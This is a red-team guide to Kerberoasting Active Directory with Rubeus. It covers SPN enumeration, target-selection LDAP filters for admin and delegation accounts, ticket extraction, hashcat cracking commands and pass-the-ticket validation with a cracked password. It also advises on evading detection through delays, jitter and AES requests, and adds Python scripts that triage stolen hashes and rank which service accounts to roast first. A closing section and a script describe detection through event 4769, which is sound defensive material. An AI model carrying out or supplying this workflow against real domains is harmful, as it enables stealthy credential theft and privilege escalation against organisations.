Kerberoasting is one of the most effective post-compromise techniques for escalating privileges in Active Directory: any authenticated domain user can request service tickets for accounts that have Service Principal Names (SPNs), and those tickets can be cracked offline to recover weak service-account passwords.
Overview
A kerberoasting attack requests TGS service tickets for accounts with registered SPNs and extracts the encrypted portion of each ticket for offline password cracking. This works because the encrypted part of a service ticket is protected with the service account's long-term key, which is derived from its password (the NT hash for RC4, etype 23; a PBKDF2-derived key for AES, etypes 17 and 18). Nothing is sent to the service itself and no failed logons are produced, so the only server-side trace is an ordinary-looking TGS request (event ID 4769) on the domain controller.
- Service Discovery: identify accounts with Service Principal Names
- Ticket Extraction: request service tickets and extract their encrypted portion
- Offline Cracking: crack the extracted hashes with external tools
Attack Methodology
1. SPN Discovery: identify service accounts in the domain with registered SPNs
2. Ticket Request: request TGS tickets for the target service accounts
3. Hash Extraction: extract the encrypted portion of each service ticket
4. Offline Cracking: use hashcat or John the Ripper to crack the extracted hashes
5. Credential Validation: test cracked credentials for access and privileges
Syntax Variations
Basic Usage
# Target all kerberoastable accounts in the current domain
Rubeus.exe kerberoast
Targeting Parameters
Target selection:
- Target a specific Service Principal Name. Example: MSSQLSvc/sql01.corp.local:1433
- File containing a list of SPNs to target, one SPN per line, for example:
  MSSQLSvc/sql01.corp.local:1433
  HTTP/web01.corp.local
  CIFS/fileserver.corp.local
- /user: target a specific username that has SPNs
- File containing a list of usernames to target
- /ldapfilter: custom LDAP filter for advanced targeting, combined with the default kerberoastable-account selection. Examples:
  admincount=1 - accounts protected by AdminSDHolder (current or former members of privileged groups)
  serviceprincipalname=* - any account with SPNs
  samaccountname=svc_* - service accounts by naming pattern
  useraccountcontrol:1.2.840.113556.1.4.803:=512 - bitwise AND test for NORMAL_ACCOUNT (0x200); the same matching rule with 2 tests ACCOUNTDISABLE, with 524288 TRUSTED_FOR_DELEGATION
- Target a specific Organizational Unit. Example: "OU=Service Accounts,DC=corp,DC=local"
- Target domain (default: current domain)
- Specific domain controller to query
Output:
- /format: hash output format for cracking tools
  hashcat (default) - hashcat mode 13100 for RC4 tickets (etype 23); AES tickets need mode 19600 (etype 17) or 19700 (etype 18)
  john - John the Ripper format
- /outfile: save extracted hashes to a file
- /nowrap: don't wrap long lines in console output (wrapped hashes break when copied to the cracking host)
- Output only the crackable hash portion
OPSEC:
- /opsec: enable OPSEC-safe features, recommended for stealth operations
- /delay: delay in milliseconds between ticket requests, recommended 3000-10000 ms for stealth
- /jitter: random percentage variation in the delay (0-100). Example: 30 = ±30% variation
- Request AES256 tickets instead of RC4. AES is the default in current domains, so AES requests blend in better than RC4 requests (which defenders flag as Ticket Encryption Type 0x17 in event 4769); the trade-off is that AES hashes crack orders of magnitude more slowly than RC4 hashes
Scoping:
- /stats: display statistics about kerberoastable accounts instead of requesting tickets
- Limit the number of results returned
- Only target accounts whose password was set after a given date, useful for recently changed passwords
- Only target accounts whose password was set before a given date, useful for old passwords that may predate the current password policy
Complete Attack Workflow
Initial Reconnaissance
Discover kerberoastable accounts and assess the environment before any ticket is requested:
# Statistics about kerberoastable accounts (no tickets requested)
Rubeus.exe kerberoast /stats
# Restrict the statistics to accounts protected by AdminSDHolder (adminCount=1)
Rubeus.exe kerberoast /ldapfilter:"admincount=1" /stats
OPSEC-Safe Extraction
Request the tickets with stealth in mind: spread requests out with a delay and jitter so they do not show up as a burst of 4769 events, and prefer a small set of targets over the whole domain:
# OPSEC-safe kerberoasting with delays
Rubeus.exe kerberoast /opsec /delay:5000 /jitter:30 /outfile:hashes.txt
# Target a specific high-value account
Rubeus.exe kerberoast /user:svc_sql /opsec /format:hashcat
Hash Processing
Prepare the hashes for the cracking host. /nowrap keeps each hash on one line, which matters whenever output is copied from a console rather than read from the file:
# Extract hashes to a file
Rubeus.exe kerberoast /outfile:hashcat_hashes.txt /format:hashcat /nowrap
# On the cracking host, verify the format: each line should start with $krb5tgs$23$ (RC4) or $krb5tgs$17$ / $krb5tgs$18$ (AES)
head -n 5 hashcat_hashes.txt
Offline Cracking
Use hashcat or John the Ripper to crack the extracted hashes. Mode 13100 is for RC4 (etype 23) tickets; AES tickets need 19600 (etype 17) or 19700 (etype 18) and crack far more slowly:
# Basic dictionary attack
hashcat -m 13100 hashcat_hashes.txt /usr/share/wordlists/rockyou.txt
# Rule-based attack
hashcat -m 13100 hashcat_hashes.txt wordlist.txt -r rules/best64.rule
# Mask attack for a common corporate pattern: one upper, five lower, three digits, one symbol
hashcat -m 13100 hashcat_hashes.txt -a 3 ?u?l?l?l?l?l?d?d?d?s
Credential Validation
Test cracked credentials for access and privileges. asktgs needs a TGT to work from, so keep a copy of the TGT when requesting it:
# Request a TGT as the cracked service account, inject it into the current session (/ptt) and save it for reuse
Rubeus.exe asktgt /user:svc_sql /password:CrackedPassword123! /ptt /outfile:svc_sql.kirbi
# Request a service ticket with that TGT to check what the account can reach
Rubeus.exe asktgs /ticket:svc_sql.kirbi /service:cifs/fileserver.corp.local /ptt
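The Hash Processing and Offline Cracking steps above assume every line in the output file is a single, well-formed hash that mode 13100 can crack. The following script is an added example (not Rubeus code, and not from the original page) that checks that before any GPU time is spent: it re-joins hashes that were wrapped across console lines because /nowrap was omitted, validates the hashcat-format layout, drops duplicate accounts (every SPN on one account yields a ticket under the same key, so one ticket per account is enough) and groups what remains by the hashcat mode that cracks it. The hash lines it parses are constructed placeholders with the right layout, not real ticket data; the per-mode file names in hashcat_commands are an assumed convention.

```python
"""Triage Rubeus kerberoast output before handing it to hashcat (added example)."""
import re

# hashcat mode per Kerberos encryption type
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}

# etype 23 (RC4-HMAC): $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$edata
RC4_RE = re.compile(r"^\$krb5tgs\$23\$\*(?P<user>[^$]+)\$(?P<realm>[^$]+)\$(?P<spn>[^*]+)\*\$"
                    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$")
# etype 17/18 (AES): $krb5tgs$18$user$REALM$*spn*$checksum(12 bytes)$edata, the *spn*$ part being optional
AES_RE = re.compile(r"^\$krb5tgs\$(?P<etype>1[78])\$(?P<user>[^$]+)\$(?P<realm>[^$]+)\$"
                    r"(?:\*(?P<spn>[^*]*)\*\$)?(?P<checksum>[0-9a-fA-F]{24})\$(?P<edata>[0-9a-fA-F]+)$")

def unwrap(text):
    """Re-join hashes wrapped over several console lines. Assumes a hash starts on a line
    containing '$krb5tgs$' and continues on the indented lines that follow (Rubeus console
    layout without /nowrap; an /outfile already holds one hash per line)."""
    hashes, current = [], None
    for raw in text.splitlines():
        if "$krb5tgs$" in raw:
            if current:
                hashes.append(current)
            current = raw[raw.index("$krb5tgs$"):].strip()
        elif current and raw[:1].isspace() and raw.strip():
            current += raw.strip()
        else:
            if current:
                hashes.append(current)
            current = None
    if current:
        hashes.append(current)
    return hashes

def parse_hash(h):
    """Validate one hash and pull out the fields needed for triage."""
    m, etype = RC4_RE.match(h), 23
    if not m:
        m = AES_RE.match(h)
        if not m:
            raise ValueError("not a krb5tgs hash in hashcat format: " + h[:40])
        etype = int(m.group("etype"))
    return {"etype": etype, "mode": HASHCAT_MODE[etype], "user": m.group("user"),
            "realm": m.group("realm").upper(), "spn": m.group("spn") or "",
            "edata": m.group("edata"), "hash": h}

def triage(text):
    """Return (per_mode, skipped): per_mode maps hashcat mode -> parsed hashes, one per
    account; skipped explains every candidate that was dropped."""
    per_mode, seen, skipped = {}, set(), []
    for h in unwrap(text):
        try:
            p = parse_hash(h)
        except ValueError as err:
            skipped.append(str(err))
            continue
        key = (p["realm"], p["user"].lower())
        if key in seen:   # same account, same key: a second ticket adds nothing
            skipped.append("duplicate account %s@%s via %s" % (p["user"], p["realm"], p["spn"]))
            continue
        seen.add(key)
        per_mode.setdefault(p["mode"], []).append(p)
    return per_mode, skipped

def hashcat_commands(per_mode, wordlist="wordlist.txt"):
    """One hashcat invocation per mode (file naming krb5tgs_<mode>.txt is an assumption)."""
    return ["hashcat -m %d krb5tgs_%d.txt %s" % (mode, mode, wordlist) for mode in sorted(per_mode)]

CHK = "0123456789abcdef0123456789abcdef"   # constructed 16-byte checksum (hex)
EDATA = "deadbeef" * 8                       # constructed ciphertext placeholder (hex)
SAMPLE = "\n".join([                         # constructed Rubeus-style output
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$" + CHK + "$" + EDATA,
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local*$" + CHK + "$" + EDATA,   # same key, second SPN
    "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$" + CHK[:24] + "$" + EDATA,  # AES256 ticket
    "[*] Hash                   : $krb5tgs$23$*svc_backup$CORP.LOCAL$CIFS/fileserver.corp.local*$" + CHK + "$" + EDATA[:32],
    "                             " + EDATA[32:],                                        # wrapped console output
    "[*] Roasted hashes written to : hashes.txt",
    "$krb5tgs$23$*truncated$CORP.LOCAL$HTTP/x*$" + CHK[:10],                               # damaged line
])

if __name__ == "__main__":
    per_mode, skipped = triage(SAMPLE)
    for mode, items in sorted(per_mode.items()):
        print("mode %d: %s" % (mode, ", ".join(p["user"] for p in items)))
    for s in skipped:
        print("skipped:", s)
    print("\n".join(hashcat_commands(per_mode)))
```

Running it on real output, the wrapped svc_backup hash is reassembled, the second svc_sql ticket and the damaged line are reported rather than silently fed to hashcat, and the AES ticket is routed to mode 19700 instead of failing to load under 13100.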
Advanced Targeting Strategies
High-Value Targets
Administrative Service Accounts
# Accounts protected by AdminSDHolder (current or former members of privileged groups)
Rubeus.exe kerberoast /ldapfilter:"admincount=1"
# Direct members of Domain Admins (memberOf is not transitive, so nested group membership is missed)
Rubeus.exe kerberoast /ldapfilter:"memberof=CN=Domain Admins,CN=Users,DC=corp,DC=local"
Delegation-Enabled Accounts
# Constrained delegation accounts
Rubeus.exe kerberoast /ldapfilter:"msds-allowedtodelegateto=*"
# Unconstrained delegation (TRUSTED_FOR_DELEGATION bit 0x80000 = 524288), high value
Rubeus.exe kerberoast /ldapfilter:"useraccountcontrol:1.2.840.113556.1.4.803:=524288"
Service-Specific Targeting
# SQL Server service accounts
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=MSSQLSvc*"
# Exchange service accounts
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=exchangeMDB*"
# IIS/Web service accounts
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=HTTP*"
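The Targeting Parameters and Advanced Targeting sections describe the selection logic as separate LDAP filters and flags; the script below is an added example (not Rubeus code, not from the original page) that applies the same rules in one pass to account records in the shape an LDAP query returns them, so the highest-value accounts can be roasted first and the AES-only ones, which cost far more to crack, are identified before any ticket is requested. The account records and the "current" date are constructed; the scoring weights are an assumption to tune per engagement. It goes slightly beyond the page's filters by also reading msDS-SupportedEncryptionTypes to predict which hashcat mode the ticket will need.

```python
"""Rank kerberoastable accounts before requesting any tickets (added example)."""
from datetime import datetime, timedelta, timezone

# userAccountControl bits, the same values the 1.2.840.113556.1.4.803 filters test
UAC_ACCOUNTDISABLE = 0x0002
UAC_NORMAL_ACCOUNT = 0x0200            # 512
UAC_TRUSTED_FOR_DELEGATION = 0x80000   # 524288, unconstrained delegation

# msDS-SupportedEncryptionTypes bits
ENC_RC4, ENC_AES128, ENC_AES256 = 0x4, 0x8, 0x10

WIN_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def to_filetime(dt):
    """datetime -> FILETIME (100 ns intervals since 1601), the pwdLastSet encoding."""
    return (dt - WIN_EPOCH) // timedelta(microseconds=1) * 10

def from_filetime(ft):
    return WIN_EPOCH + timedelta(microseconds=ft // 10)

def is_kerberoastable(acct):
    """Default selection: enabled user account (not a machine account) with an SPN, excluding krbtgt."""
    uac = acct["userAccountControl"]
    return (bool(acct.get("servicePrincipalName"))
            and not uac & UAC_ACCOUNTDISABLE
            and bool(uac & UAC_NORMAL_ACCOUNT)
            and acct["sAMAccountName"].lower() != "krbtgt")

def rank(accounts, now, old_password_days=365):
    """Return candidates ordered by value, each with its reasons and the ticket type to expect."""
    ranked = []
    for a in accounts:
        if not is_kerberoastable(a):
            continue
        score, reasons = 0, []
        if a.get("adminCount") == 1:
            score += 5
            reasons.append("adminCount=1 (protected by AdminSDHolder)")
        if a["userAccountControl"] & UAC_TRUSTED_FOR_DELEGATION:
            score += 4
            reasons.append("unconstrained delegation")
        if a.get("msDS-AllowedToDelegateTo"):
            score += 3
            reasons.append("constrained delegation to " + ", ".join(a["msDS-AllowedToDelegateTo"]))
        age = (now - from_filetime(a["pwdLastSet"])).days
        if age >= old_password_days:
            score += 2
            reasons.append("password %d days old" % age)
        # An unset/0 msDS-SupportedEncryptionTypes is treated as RC4-capable here (the
        # common default); this is an assumption to confirm against the DC's behaviour.
        enc = a.get("msDS-SupportedEncryptionTypes", 0)
        ticket = "rc4 (hashcat 13100)" if enc == 0 or enc & ENC_RC4 else "aes (hashcat 19600/19700, much slower)"
        ranked.append({"account": a["sAMAccountName"], "score": score, "reasons": reasons, "ticket": ticket})
    ranked.sort(key=lambda r: (-r["score"], r["account"]))
    return ranked

NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)   # constructed "current" date

def days_ago(n):
    return to_filetime(NOW - timedelta(days=n))

SAMPLE_ACCOUNTS = [   # constructed records, not from a real domain
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "adminCount": 1, "userAccountControl": 0x200, "pwdLastSet": days_ago(1100)},
    {"sAMAccountName": "svc_web", "servicePrincipalName": ["HTTP/web01.corp.local"],
     "userAccountControl": 0x200 | 0x80000, "pwdLastSet": days_ago(30),
     "msDS-SupportedEncryptionTypes": ENC_AES128 | ENC_AES256},
    {"sAMAccountName": "svc_old", "servicePrincipalName": ["CIFS/fileserver.corp.local"],
     "userAccountControl": 0x200, "pwdLastSet": days_ago(2000)},
    {"sAMAccountName": "svc_backup", "servicePrincipalName": ["backup/bk01.corp.local"],
     "userAccountControl": 0x200 | 0x2, "pwdLastSet": days_ago(900)},           # disabled
    {"sAMAccountName": "krbtgt", "servicePrincipalName": ["kadmin/changepw"],
     "userAccountControl": 0x200 | 0x2, "pwdLastSet": days_ago(3000)},
    {"sAMAccountName": "WS01$", "servicePrincipalName": ["HOST/ws01.corp.local"],
     "userAccountControl": 0x1000, "pwdLastSet": days_ago(10)},                  # machine account
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200, "pwdLastSet": days_ago(5)},   # no SPN
]

if __name__ == "__main__":
    for r in rank(SAMPLE_ACCOUNTS, NOW):
        print("%-12s score=%d  %s  [%s]" % (r["account"], r["score"], r["ticket"], "; ".join(r["reasons"])))
```

In the constructed data svc_sql ranks first (adminCount=1 and a three-year-old password), svc_web second (unconstrained delegation, but AES-only, so its ticket will be slow to crack), and the disabled, machine, krbtgt and SPN-less accounts never appear, matching what Rubeus's default selection would return.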
OPSEC Considerations
Detection Risk: kerberoasting generates TGS requests that are logged on domain controllers (event ID 4769, when Kerberos service ticket operations auditing is enabled) and can be monitored and correlated by security tooling.
Domain Controller Logs
Event ID 4769 - Kerberos Service Ticket Request. Indicators defenders look for:
- High volume of TGS requests for distinct services from a single user or source address in a short window
- Requests for service accounts that are not normally accessed
- RC4 tickets (Ticket Encryption Type 0x17) in environments where AES is the baseline
- Requests for administrative (adminCount=1) service accounts
Network Traffic
- High frequency of TGS requests
- Kerberos traffic to domain controllers from non-standard sources
- LDAP queries for servicePrincipalName (the enumeration step that precedes the ticket requests)
Host-Based Detection
- Processes making unusual Kerberos API calls
- Memory access patterns consistent with ticket extraction
- File creation in temp directories (hash output files)
- Execution of password cracking tools
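The domain-controller indicators above turn into a small amount of detection logic. The following is an added example, not from the original page or any vendor product, that runs two of them over event 4769 records already parsed into dicts (field names follow the 4769 EventData XML: TargetUserName is the requesting principal, ServiceName the account the ticket was issued for): a burst of tickets for many distinct services from one principal inside a sliding window, and RC4 (0x17) tickets in a domain whose baseline is AES. The sample events are constructed; the window, threshold and legacy-service allowlist are assumptions to tune per environment.

```python
"""Flag kerberoasting in Windows Security event 4769 records (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17   # Ticket Encryption Type value for RC4-HMAC

def is_candidate(ev):
    """Keep successful requests for user (non-machine) service accounts; krbtgt is TGT traffic."""
    svc = ev["ServiceName"]
    if int(ev.get("Status", "0x0"), 16) != 0:   # failed request, no ticket issued
        return False
    return not svc.endswith("$") and svc.lower() != "krbtgt"

def detect(events, window_seconds=300, distinct_threshold=5, rc4_allowlist=frozenset()):
    """Return alerts (dicts with rule, user, ip, services), at most one per principal and rule."""
    alerts = []
    cands = sorted((e for e in events if is_candidate(e)), key=lambda e: e["TimeCreated"])

    # Rule 1: RC4 tickets in an AES-baseline domain, except known legacy services
    rc4 = defaultdict(set)
    for e in cands:
        if int(e["TicketEncryptionType"], 16) == RC4_HMAC and e["ServiceName"].lower() not in rc4_allowlist:
            rc4[(e["TargetUserName"], e["IpAddress"])].add(e["ServiceName"])
    for (user, ip), svcs in rc4.items():
        alerts.append({"rule": "rc4_ticket", "user": user, "ip": ip, "services": sorted(svcs)})

    # Rule 2: many distinct services requested by one principal inside a sliding window
    per_src = defaultdict(list)
    for e in cands:
        per_src[(e["TargetUserName"], e["IpAddress"])].append(e)
    for (user, ip), evs in per_src.items():
        window, alert = [], None
        for e in evs:
            t = datetime.fromisoformat(e["TimeCreated"])
            window.append(e)
            while datetime.fromisoformat(window[0]["TimeCreated"]) < t - timedelta(seconds=window_seconds):
                window.pop(0)
            distinct = {w["ServiceName"].lower() for w in window}
            if alert is not None:   # already firing: keep collecting the services in the burst
                alert["services"] = sorted(set(alert["services"]) | distinct)
            elif len(distinct) >= distinct_threshold:
                alert = {"rule": "tgs_burst", "user": user, "ip": ip, "services": sorted(distinct)}
                alerts.append(alert)
    return alerts

def ev(t, user, svc, ip, etype, status="0x0"):
    """Build one constructed 4769 record."""
    return {"TimeCreated": t, "TargetUserName": user, "ServiceName": svc, "IpAddress": ip,
            "TicketEncryptionType": etype, "Status": status}

ROASTED = ["svc_sql", "svc_web", "svc_backup", "svc_sccm", "svc_exchange", "svc_ftp", "svc_print"]
SAMPLE_EVENTS = (   # constructed events, not from a real domain
    [ev("2024-05-01T09:00:00", "jdoe@CORP.LOCAL", "krbtgt", "10.0.0.5", "0x12")]
    # jdoe requests RC4 tickets for seven service accounts in 13 seconds
    + [ev("2024-05-01T09:00:%02d" % (2 * i + 1), "jdoe@CORP.LOCAL", s, "10.0.0.5", "0x17")
       for i, s in enumerate(ROASTED)]
    + [ev("2024-05-01T09:00:15", "jdoe@CORP.LOCAL", "svc_hr", "10.0.0.5", "0x17", status="0x7")]  # failed
    # normal users and machines: AES tickets, one or two services each
    + [ev("2024-05-01T09:05:00", "asmith@CORP.LOCAL", "svc_web", "10.0.0.7", "0x12"),
       ev("2024-05-01T09:20:00", "asmith@CORP.LOCAL", "svc_sql", "10.0.0.7", "0x12"),
       ev("2024-05-01T09:21:00", "WS01$@CORP.LOCAL", "DC01$", "10.0.0.9", "0x12"),
       ev("2024-05-01T09:30:00", "bob@CORP.LOCAL", "svc_legacy", "10.0.0.8", "0x17")]   # known RC4-only app
)

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS, rc4_allowlist=frozenset({"svc_legacy"})):
        print("%-11s %s from %s: %s" % (a["rule"], a["user"], a["ip"], ", ".join(a["services"])))
```

With the allowlist in place only jdoe's activity fires, on both rules; drop the allowlist and bob's single RC4 ticket for the legacy service is reported as well, which is the usual tuning decision when a domain still has RC4-only applications.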
Troubleshooting
No Results
Problem: no kerberoastable users found.
Solutions:
- Verify LDAP connectivity to the domain controllers
- Check that the current user can run LDAP queries (any authenticated domain user normally can)
- Confirm that enabled user accounts with SPNs exist; machine accounts, disabled accounts and krbtgt are excluded
- Try broader LDAP filters
# Test LDAP connectivity and get counts without requesting tickets
Rubeus.exe kerberoast /stats
# Try the broadest targeting
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=*"
Related Tools
- BloodHound: identify high-value service accounts before kerberoasting
- Hashcat/John: process extracted hashes with dedicated password cracking tools
- Impacket: use GetUserSPNs.py for SPN enumeration and ticket requests from a non-Windows host
- PowerView: combine with PowerView for additional Active Directory reconnaissance